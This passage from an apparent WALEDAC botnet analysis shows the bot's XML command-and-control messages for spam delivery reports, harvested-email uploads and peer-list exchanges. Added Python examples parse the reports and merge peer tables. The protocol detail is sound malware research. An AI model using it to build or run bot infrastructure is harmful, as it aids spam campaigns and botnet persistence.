    <rep id="4" rcpt="[email protected]">ERR</rep>
    <rep id="4" rcpt="[email protected]">ERR</rep>
    <rep id="4" rcpt="[email protected]">ERR</rep>
    <rep id="4" rcpt="[email protected]">OK</rep>
    <rep id="4" rcpt="[email protected]">OK</rep>
    …
    <rep id="4" rcpt="[email protected]">ERR</rep>
    <rep id="4" rcpt="[email protected]">ERR</rep>
  </reports>
</lm>
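The delivery report is the message a responder cares about most, because it names the addresses that actually received spam. The following Python is an added example, not code from the paper or from WALEDAC: it decodes a report, tolerating the mix of base64 and clear-text fields the sample above shows, and tallies results per task. The sample report and its example.org addresses are constructed.

```python
"""Decode a WALEDAC task report (command type 05) and tally delivery results.

Added example, not code from the paper or from the malware. The sample is
constructed after the report in the appendix: with the b64 prop set to
"true" the recipient and the OK/ERR result are base64-encoded, but the
page's own sample also carries entries in the clear, so decoding falls
back to the raw value when a field is not valid base64.
"""
import base64
import binascii
import xml.etree.ElementTree as ET
from collections import Counter


def b64(s):
    return base64.b64encode(s.encode()).decode()


# Constructed report: results for two tasks, mixing encoded and clear entries.
SAMPLE_REPORT = f"""<lm>
  <t>taskreq</t><v>34</v><i>1302b4463f55063a6c293a55412a820e</i><r>0</r>
  <props><p n="b64">true</p></props>
  <reports>
    <rep id="4" rcpt="{b64('alice@example.org')}">{b64('OK')}</rep>
    <rep id="4" rcpt="{b64('bob@example.org')}">{b64('ERR')}</rep>
    <rep id="4" rcpt="{b64('carol@example.org')}">{b64('ERR')}</rep>
    <rep id="3" rcpt="dave@example.org">OK</rep>
    <rep id="3" rcpt="{b64('erin@example.org')}">{b64('OK')}</rep>
  </reports>
</lm>"""


def decode_field(value, encoded):
    """Base64-decode when the message says so, but tolerate clear-text fields."""
    if not encoded:
        return value
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        # '@' is not a base64 character and "OK"/"ERR" have the wrong length,
        # so a field sent in the clear fails validation and is kept as-is.
        return value


def parse_report(xml_text):
    """Yield one dict per <rep>: reporting bot, task id, recipient and result."""
    root = ET.fromstring(xml_text)
    if root.find("reports") is None:
        raise ValueError("no <reports> element: this is a task request, not a report")
    encoded = root.findtext("props/p[@n='b64']") == "true"
    bot = root.findtext("i")
    for rep in root.iter("rep"):
        yield {
            "bot": bot,
            "task": int(rep.get("id")),
            "rcpt": decode_field(rep.get("rcpt"), encoded),
            "result": decode_field((rep.text or "").strip(), encoded),
        }


def delivery_stats(entries):
    """Per-task counts of each result, e.g. {4: Counter({'ERR': 2, 'OK': 1})}."""
    stats = {}
    for e in entries:
        stats.setdefault(e["task"], Counter())[e["result"]] += 1
    return stats


def delivered_to(entries):
    """Recipients whose delivery succeeded: the set a responder would want to notify."""
    return sorted(e["rcpt"] for e in entries if e["result"] == "OK")


if __name__ == "__main__":
    entries = list(parse_report(SAMPLE_REPORT))
    print(delivery_stats(entries))
    print(delivered_to(entries))
```

The validate=True flag on b64decode is what makes the fallback safe: without it the decoder silently discards non-alphabet characters and would turn a clear-text address into garbage instead of raising.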

Command Type: 07 (EMAILS)

This POST uploads a list of email addresses from the bot, presumably addresses it has harvested, in the clear inside a CDATA section; the reply carries no properties. The sample was sent by a different bot from the previous ones (note the different <i> value).

SAMPLE POST

<lm>
  <t>emails</t>
  <v>33</v>
  <i>f354c452d248956636628b3210726273</i>
  <r>0</r>
  <props></props>
  <emails>
    <![CDATA[[email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] … … … [email protected]]]>
  </emails>
</lm>

SAMPLE REPLY

<lm>
  <v>33</v>
  <t>emails</t>
  <props></props>
</lm>

Command Type: NONE

This message has no <t> element. It carries the sender’s clock (<localtime>, a Unix timestamp; 1235869809 is 1 March 2009 UTC) and its list of known peers: for each <node>, the peer’s IP address, port (80 in every entry, the protocol riding on HTTP), a timestamp (all slightly earlier than localtime, so presumably when the peer was last seen) and the peer’s 32-hex-digit node ID. This is the exchange that keeps the HTTP2P overlay connected.

SAMPLE POST

<lm>
  <localtime>1235869809</localtime>
  <nodes>
    <node ip="195.96.244.xx" port="80" time="1235869344">a111e9168a33ea4ff47c84243b428e0a</node>
    <node ip="70.79.134.xx" port="80" time="1235869165">e867ea6c84678350156ae142651ed116</node>
    <node ip="83.2.246.xxx" port="80" time="1235869077">2867497c3053ca7c7a619f09845e0348</node>
    <node ip="80.51.135.xx" port="80" time="1235869014">6870617e2a34a621db62b11f7d4f2116</node>
    …
    <node ip="5.236.20.xxx" port="80" time="1235868066">ca523476545a8d06096d5059b7517f1b</node>
  </nodes>
</lm>
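A node that receives this list has to decide which entries to trust and how to merge them into what it already knows. The following Python is an added example, not code from the paper or from WALEDAC: it parses a constructed peer list, rejects malformed node IDs and stale or future-dated entries, and merges the survivors into a local table keeping the newest sighting per node ID. The addresses come from the 192.0.2.0/24 and 198.51.100.0/24 documentation ranges, the node IDs are made-up 32-hex-digit strings in the page’s format, and the one-hour freshness window and the merge rule are this example’s assumptions, not values from the paper.

```python
"""Parse a WALEDAC peer-list message and merge it into a local peer table.

Added example, not code from the paper or from the malware. The sample is
constructed after the untyped POST in the appendix, with documentation-range
addresses and made-up node IDs. MAX_AGE and the merge rule are assumptions.
"""
import re
import xml.etree.ElementTree as ET

NODE_ID = re.compile(r"^[0-9a-f]{32}$")
MAX_AGE = 3600  # seconds; an assumption, not a value from the paper

# Constructed sample: one fresh peer, one stale peer, one entry with a bad id.
SAMPLE_PEER_LIST = """<lm>
  <localtime>1235869809</localtime>
  <nodes>
    <node ip="192.0.2.17" port="80" time="1235869344">a111e9168a33ea4ff47c84243b428e0a</node>
    <node ip="198.51.100.5" port="80" time="1235800000">e867ea6c84678350156ae142651ed116</node>
    <node ip="192.0.2.99" port="80" time="1235869800">not-a-node-id</node>
  </nodes>
</lm>"""


def parse_peer_list(xml_text, max_age=MAX_AGE):
    """Return usable peers, freshest first, judged against the sender's <localtime>."""
    root = ET.fromstring(xml_text)
    if root.find("t") is not None or root.find("nodes") is None:
        raise ValueError("not a peer-list message")
    now = int(root.findtext("localtime"))
    peers = []
    for node in root.iter("node"):
        node_id = (node.text or "").strip()
        if not NODE_ID.match(node_id):
            continue  # malformed entry: do not let one bad record poison the table
        age = now - int(node.get("time"))
        if age < 0 or age > max_age:
            continue  # stale, or timestamped in the sender's future
        peers.append({"id": node_id, "ip": node.get("ip"),
                      "port": int(node.get("port")), "last_seen": now - age})
    peers.sort(key=lambda p: p["last_seen"], reverse=True)
    return peers


def merge_peers(table, peers):
    """Merge received peers into table (id -> peer), keeping the newest sighting per id."""
    for p in peers:
        known = table.get(p["id"])
        if known is None or p["last_seen"] > known["last_seen"]:
            table[p["id"]] = p
    return table


if __name__ == "__main__":
    table = merge_peers({}, parse_peer_list(SAMPLE_PEER_LIST))
    for peer in table.values():
        print(peer["id"], peer["ip"], peer["port"], peer["last_seen"])
```

Judging freshness against the sender’s own localtime rather than the receiver’s clock is deliberate: the two machines’ clocks are unrelated, and the page’s sample shows the timestamps only make sense relative to the localtime sent with them.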


REFERENCES

» NNL-labs. http://www.nnl-labs.com/cblog/
» sudosecure.net. http://www.sudosecure.net/WALEDAC/index.php
» shadowserver.org. http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20081231
» SecureWorks (Joe Stewart). http://www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf
» honeynet.org. http://www.honeynet.org/node/325 and http://www.honeynet.org/node/348
» OpenSSL. http://www.openssl.org
» Wikipedia, RSA. http://en.wikipedia.org/wiki/RSA
» Wikipedia, Advanced Encryption Standard. http://en.wikipedia.org/wiki/Advanced_Encryption_Standard
» Wikipedia, bzip2. http://en.wikipedia.org/wiki/bzip2
» TinyXML. http://www.grinninglizard.com/tinyxml/index.html
» TinyXML. http://sourceforge.net/projects/tinyxml/
» PyCrypto. http://www.amk.ca/python/code/crypto.html
» PyCrypto. http://www.dlitz.net/software/pycrypto/
» PyCrypto. http://www.voidspace.org.uk/python/modules.shtml#pycrypto
» Spamhaus Statistics: The Top 10. http://www.spamhaus.org/statistics/spammers.lasso

PICTURE CREDITS

» Trend Micro Malware Blog